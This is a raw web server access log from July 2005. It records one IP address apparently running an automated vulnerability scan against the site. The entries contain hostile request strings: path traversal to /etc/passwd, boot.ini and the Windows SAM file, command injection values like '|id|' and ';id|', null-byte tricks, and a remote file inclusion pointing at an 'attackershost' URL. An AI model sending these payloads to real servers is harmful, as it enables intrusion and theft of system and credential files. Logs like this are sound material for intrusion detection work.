[05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /NetDemo2/html.aspx?file=../../../../../../../../../boot.ini HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /NetDemo2/html.aspx? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /news.asp?id=7661%20 HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/htsearch?Exclude=%60/etc/passwd%60 HTTP/1.0" 200 290 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /ldap/cgi-bin/ldacgi.exe? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /webapp/commerce/command/ExecMacro/mall_dir.d2w/report HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/db2www/ HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK HTTP/1.0" 404 252 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /enteteacceuil.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /index.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /emumail.cgi?type=.%00 HTTP/1.0" 403 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /db2www.ini%20 HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /servlet/file/login.jsp HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cgi-bin/newsdesk.cgi HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /carbo.dll HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /protected%2fsecret.html%20 HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /Members/root/index.inc.php? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /iisprotect/admin/SiteAdmin.ASP? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /cutenews/shownews.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /shop/normal_html.cgi?file=|id|%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:45 +0100] "GET /category_news_headline.asp? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /shop/normal_html.cgi?file=|id|%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /cgi-bin/register.cgi HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /cgi-bin/ikonboard/help.cgi? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid] HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /admin/auth.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /quikmail/nph-emumail.cgi?type=../%00 HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /include/help.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /resend.asp? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid] HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /cgi-bin/imagefolio/admin/admin.cgi? HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /cgi-bin/nph-exploitscanget.cgi? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /cgi-bin/nph-exploitscanget.cgi? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:46 +0100] "GET /cgi-bin/info2www HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /spelling.php3%20 HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /dotproject/modules/projects/view.php? HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /cgi-bin/webdriver HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /advwebadmin/autosignup/dsp_newwebadmin.asp HTTP/1.0" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /advwebadmin/folders/Folderactions.asp HTTP/1.0" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /includes/hotnews-engine.inc.php3? HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /ez2000/ezboard.cgi HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /instaboard/index.cfm? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /ipchat.php? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /admin/inc_channel_edit.asp?iChannel=5%20 HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /cgi-bin/FileSeek.cgi?head=;id|&foot= HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:47 +0100] "GET /NetDemo2/OpenFile.aspx?file=../../../../../../../../boot.ini HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /templates/Page.aspx?id=20691%20 HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /admin.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /index.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /cgi-bin/ion-p?page=../../../../../etc/hosts%20 HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /cgi-bin/handler HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /cgi-bin/wrap HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /entete.php? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html HTTP/1.0" 403 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /ixmail_netattach.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /prometheus-all/index.php? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /browser.php?directory=/etc/services HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /login.jsp HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /_admin/upload.php HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /%70rotected/secret.html%20 HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /memberlist.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /Members/index.inc.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /modcp/index.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /private.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /showthread.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /comment_add.asp? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /cgi-bin/jj HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /photos/showimages.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /jgb_eng_php3/cfooter.php3 HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /tmp_view.php?file=/etc/passwd HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /idealbb/error.asp? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:48 +0100] "GET /k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /emumail.cgi?type=.%00 HTTP/1.0" 403 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /do_subscribe? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /add_acl? HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /tmp_view.php?file=/etc/passwd HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /do_map? HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /protection.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /login.php3?reason=chpass2%20 HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /kb/index.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /rolis_book_path/insert.inc.php? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /dotproject/modules/projects/addedit.php? HTTP/1.0" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /derniers_commentaires.php? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /cgi-bin/ad.cgi HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:49 +0100] "GET /cgi-bin/simplestmail.cgi HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /admin/inc_channel_listing.asp%20 HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /cgi-bin/FileSeek.cgi?head=&foot=;id| HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /instantwebmail/message.php? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /directory/blog.cgi? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /directory/blog.cgi? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /Gozila.cgi? HTTP/1.0" 403 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /psynch/nph-psa.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /cgi-bin/ion-p.exe?page=c:\\winnt\\repair\\sam%20 HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /psynch/nph-psa.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /psynch/nph-psa.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /CFIDE/probe.cfm HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts HTTP/1.0" 403 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /article.cfm HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /web_app/WEB-INF/jrun-web.xml HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /web_app/WEB-INF/webapp.properties HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /web_app/WEB-INF/webapp.properties HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /error/500error.jsp? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /showmail.pl? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /_admin/list_all.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /cgi-bin/mail/nph-mr.cgi? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /index.inc.php? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /cgi-bin/auctiondeluxe/auction.pl HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /admincp/index.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:50 +0100] "GET /index.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /index.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET //pollBooth.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /mambo/index.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /mambo/administrator/phpinfo.php%20 HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /ROADS/cgi-bin/search.pl HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /php/gaestebuch/admin/index.php? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /cgi-bin/formmail.pl HTTP/1.0" 200 994 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /cgi-bin/info2www HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /mall_log_files/order.log HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /Admin_files/order.log HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /metadot/index.pl? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:51 +0100] "GET /vars.inc%20 HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /metacart/database/metacart.mdb%20 HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /cgi-bin/auction/auction.cgi? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /dotproject/modules/files/index_table.php? HTTP/1.0" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:\\&Opt=3 HTTP/1.0" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /modules.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /config/fonctions.lib.php? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /Site/biztalkhttpreceive.dll? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /biztalktracking/RawCustomSearchField.asp? HTTP/1.0" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /exchange/root.asp?acs=anon HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /cgi-bin/simplestguest.cgi HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /admin/inc_pics.asp%20 HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /script/tools/newdsn.exe HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:52 +0100] "GET /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp%20 HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /scripts/samples/details.idc HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /shoppingdirectory/midicart.mdb%20 HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /psynch/nph-psf.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /admin/upload.php HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /psynch/nph-psf.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/w3-msql HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /admin/credit_card_info.php HTTP/1.0" 404 220 